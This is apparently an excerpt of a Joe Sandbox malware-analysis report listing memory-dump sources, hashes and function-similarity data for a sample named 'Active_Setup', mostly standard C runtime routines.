                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsend
                                                                                                                                                  • String ID: Send failure: %s
                                                                                                                                                  • API String ID: 1802528911-857917747
                                                                                                                                                  • Opcode ID: 789906747ece19f3c779339ef0c2dada38ae5d5c45f438243c8c7852779e83df
                                                                                                                                                  • Instruction ID: 0f4956e1f27aaec9c5bdbe4a4e25278f6bf4900f6161718dd5ad1d9f7aecabad
                                                                                                                                                  • Opcode Fuzzy Hash: 789906747ece19f3c779339ef0c2dada38ae5d5c45f438243c8c7852779e83df
                                                                                                                                                  • Instruction Fuzzy Hash: EA01B1B5204304AFC720DB68DC84FA777E8FB89322F10455AF944C7240C639A8009F61
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 010865F1: __getptd.LIBCMT ref: 010865F7
                                                                                                                                                    • Part of subcall function 010865F1: __getptd.LIBCMT ref: 01086607
                                                                                                                                                  • __getptd.LIBCMT ref: 01091357
                                                                                                                                                    • Part of subcall function 01087909: __getptd_noexit.LIBCMT ref: 0108790C
                                                                                                                                                    • Part of subcall function 01087909: __amsg_exit.LIBCMT ref: 01087919
                                                                                                                                                  • __getptd.LIBCMT ref: 01091365
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.1934478888.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.1934450357.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934698250.000000000109F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934737617.00000000010E8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934754654.00000000010EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934769624.00000000010EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934784745.00000000010F6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.00000000010F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.1934813334.0000000001106000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_fb0000_Active_Setup.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                  • String ID: csm
                                                                                                                                                  • API String ID: 803148776-1018135373
                                                                                                                                                  • Opcode ID: 0a4f4f6865025eb1d26a091e8466ca80fd7b9e4aece42d33b984e554c5363287
                                                                                                                                                  • Instruction ID: 0cf49879f7ef7070211fadf35deb1a48ed652bf68bcccdadfc9fad400dfc9599
                                                                                                                                                  • Opcode Fuzzy Hash: 0a4f4f6865025eb1d26a091e8466ca80fd7b9e4aece42d33b984e554c5363287
                                                                                                                                                  • Instruction Fuzzy Hash: 5001AD30A04307CBEF35AF68C460ABCB7F8AF10224F24C6AED4C096A51EB358590EF50